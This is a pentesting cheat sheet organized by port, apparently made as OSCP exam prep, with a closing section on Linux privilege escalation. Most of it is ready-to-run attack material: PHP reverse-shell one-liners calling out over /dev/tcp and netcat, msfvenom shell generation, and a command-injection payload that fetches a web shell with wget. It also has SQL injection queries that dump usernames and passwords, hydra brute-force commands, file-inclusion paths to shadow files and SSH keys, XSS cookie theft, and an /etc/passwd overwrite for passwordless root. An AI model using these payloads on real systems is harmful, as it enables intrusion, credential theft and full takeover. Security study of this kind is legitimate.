PORT 21 (FTP)-Check for anonymous login (anonymous:anonymous)-Check for di

1. PORT 21 (FTP)
2.  
3. -Check for anonymous login (anonymous:anonymous)
4. -Check for directory transversal ( ls ../../../) enumerate files outside the FTP root.
5. Look for password files that could be used on ssh or a webserver.
6. -Check ftp version for buffer overflows or other exploits.
7. -Check to see if there are writable directories, like web roots.
8. EXAMPLE: (cd wwwroot; put shell.asp)
9.  
10. PORT 22 (SSH)
11.  
12. -Banner grab version (nc ipaddress 22)
13. -Google ssh version for exploits etc.
14. -Predictable PRNG? (sufferance)
15. -Once a username is discovered TRY A BRUTEFORCE
16. EXAMPLE: (hydra -l patrick -P /usr/share/wordlists/rockyou.txt 10.11.1.24 ssh)
17. -SSH can be used to portforward any service that is only accepting local connections
18. EXAMPLE: (ssh -L 127.0.0.1:80:intra.example.com:80 gw.example.com)
19.  
20. PORT 23 (TELNET)
21.  
22. -Bruteforce (hydra -l root -P /usr/share/worslists/rockyou.txt 10.11.1.12 telnet)
23. -Banner grab version and look for exploits (nc 10.11.1.12 23)
24.  
25. PORT 25 (SMTP)
26.  
27. -Manually or automated VRFY users, greet server with ehlo if needed.
28. -Bear in mind pop3 could also be vulnerable to login/access.
29. -Check version as always, benner grab with telnet
30.  
31. PORT 80 (HTTP)
32.  
33. -Nikto to check for low hanging fruit (nikto -h http://10.11.1.12)
34. -Google all versions returned from Nikto, watch for shellshock, .action pages, robots.txt, manually poke around, check source code
35. -Gobuster (/usr/bin/gobuster -w /usr/share/wordlists/dirb/big.txt -u http://10.11.0.42). Add -X to search extensions
36. -Login Form = SQLI or Default Credentials, or rabbithole. Those are the main options.
37. -Try admin:admin, admin:password etc.
38. -Try to understand the webserver, whats its purpose? what features are availible? if something stands out, it could be the way in...
39.  
40. -SQLI >> ' or 1=1-- >> admin'-- >> ' or '1'='1#
41. -Error based SQLI, identify queiry string or error (http://meme.com?id=1)
42. -Enumerate columns (http://meme.com?id=1 order by 1) keep going until unknown column error.
43. -Determine best column to use to display output (http://meme.com?id=1 union all select 1,2,3,4,5)
44. -If you see a number on the screen that column can be used.
45. -Find tables in database (http://meme.com?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables
46. -Display table columns in tables found (http://meme.com?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns WHERE table_name='users'
47. -Display column contents, use concat for multiple
48. (http://meme.com?id=1 union all select 1,2,3,concat(usernames,0x3a,passwords),5 FROM users
49. -Side note sometimes sleep(0) comes in handy if no output is being displayed, see Hackademic_RTB1 box.
50.  
51. -Check Nikto see if PUT is enabled, if so use nmap scripts to upload a shell. (nmap -p 80 <ip> --script http-put --script-args http-put.url='/uploads/rootme.php',http-put.file='/tmp/rootme.php')
52. -Also viable are .asp shells or .ps1 for powershell.
53.  
54. -PHP Payloads
55. 1) <?php echo shell_exec("bash -i >& /dev/tcp/10.0.0.1/8080 0>&1");?>
56. 2) <?php echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f");?>
57. 3) <?php echo shell_exec($_GET['e']);?>
58. 4) php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
59. 5) pentest monkey php reverse shell, availible here http://pentestmonkey.net/tools/web-shells/php-reverse-shell
60.  
61. -ASP Shell Generation (msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.42 LPORT=4444 -f asp > shell.asp
62.  
63. -LFI (Local File Inclusion)
64. -Basic Test For Apache Linux is 3 Directories ../../../etc/passwd
65. -Check query strings like ?page=, ?file=
66. -Older php versions allow truncating the extension ../../../etc/passwd%00 if the server adds an extension to the file
67. -FILES TO INCLUDE
68. 1) /etc/passwd
69. 2) /etc/shadow ?
70. 3) /root/.ssh/id_rsa
71. 4) index.php
72. 5) Any other files discovered (i see you poison from htb)
73.  
74. -LFI to RCE
75. -try to include /proc/self/environ
76. -if this file can be included put one of the php shells as the current user agent. When the file is included the php will be ineterpreted and run.
77. -try to include /proc/self/fd
78. -if this can be included find the main log file by including /self/1 all the way through 23
79. -then change the referer header to php and revisit the file to run the code.
80. -try to include /var/apache/logs/access.log
81. -if this can be included get rce.
82.  
83. -RFI (Remote File Inclusion)
84. -Check ALL LFI QUERY STRINGS!
85. -listen on standard http port with netcat as a check (nc -lnvp 80) then ?page=http://10.11.0.42
86. -check if a get request is made to the handler.
87. -Use a php payload to gain a shell, remember null byte may be added to truncate extension on lower php versions
88. -If execution of root commands is availible from any other means, change the mod of the php shell dir to root suid bit.
89.  
90. -XSS (Cross Site Scripting)
91. -Easy enough, first try script tags, then an iframe... maybe some shennagins like <scr<script>ipt> other encodings
92. -Hijack admin password by making a request to a netcat port 80 handler (http://10.11.0.41/meme.php + document.cookie)
93. -Does this even apply to the exam??
94. -Can maybe use stored xss to make GET api requests to do some fun stuff (might be out of scope entirely)
95.  
96. -Command Injection
97. -Pretty simple, webserver calls upon the operating system to perform tasks without sanitizing arguments.
98. -ping.php, can input something with a seperator (127.0.0.1; ls)
99. -From there use wget payload to upload a shell (127.0.0.1; wget http://10.11.0.42/shell.php -o /var/www/html/shell.php)
100. -Blind and File-based out of scope NO COMMIX ALLOWED
101.  
102. -Weak Authentication
103. -Pretty straight forward admin:admin, admin:password, administrator:administrator etc.
104. -Apache Tomcat, tomcat:tomcat, tomcat:password
105. -GOOGLE ALL DEFAULT PASSWORDS
106.  
107. -In general, use brain and google all versions, remember a lot is out of scope for oscp... no xxe or pickle deseralization lol
108.  
109. PORT 445 (SMB)
110. -Note this is one case where sparta can save a lot of time...
111. -run nmap nse scripts on the target (nmap --script=vuln 10.11.0.41)
112. -Find smb users (nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254)
113. -Try to find open smb shares (nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24)
114. -access the share (smbclient "\\\\ip\\Bob Share\\rootfs") sufference lol
115. -Try to read ssh keys, or other files maybe /etc/shadow?
116. -Use any exploits that provide RCE, manual eternalblue https://github.com/3ndG4me/AutoBlue-MS17-010 etc.
117. -remember filtered port 445 or 139 in privesc can be portforwarded to use smb exploits!!
118. -impacket smb client very useful!
119.  
120. PRIVESC LINUX
121. -check current user (whoami)
122. -check kernel version (uname -a) google for exploits, check exploitdb
123. -upload linuxprivchecker.py (python -m SimpleHTTPServer 80) (wget http://10.11.0.42/linuxprivchecker.py)
124. -in general use brain.
125. -ssh tunnel filtered services.
126. -check to see writable files, remember privesc with python scripts and how import reads from the pwd
127. -check sudo priviliges (sudo -l) use those to overwrite files, or to run other commands as root
128. -check for all files with "pass" in them.
129. -is /etc/passwd writable? if so use (echo root::0:0:root:/root:/bin/bash > /etc/passwd) then (su)
130. -if /etc/passwd is readable try and crack hashes unshadow with /passwd first (unshadow passwd.txt shadow.txt > passwords.txt) (john passwords.txt /usr/share/wordlists/rockyou.txt)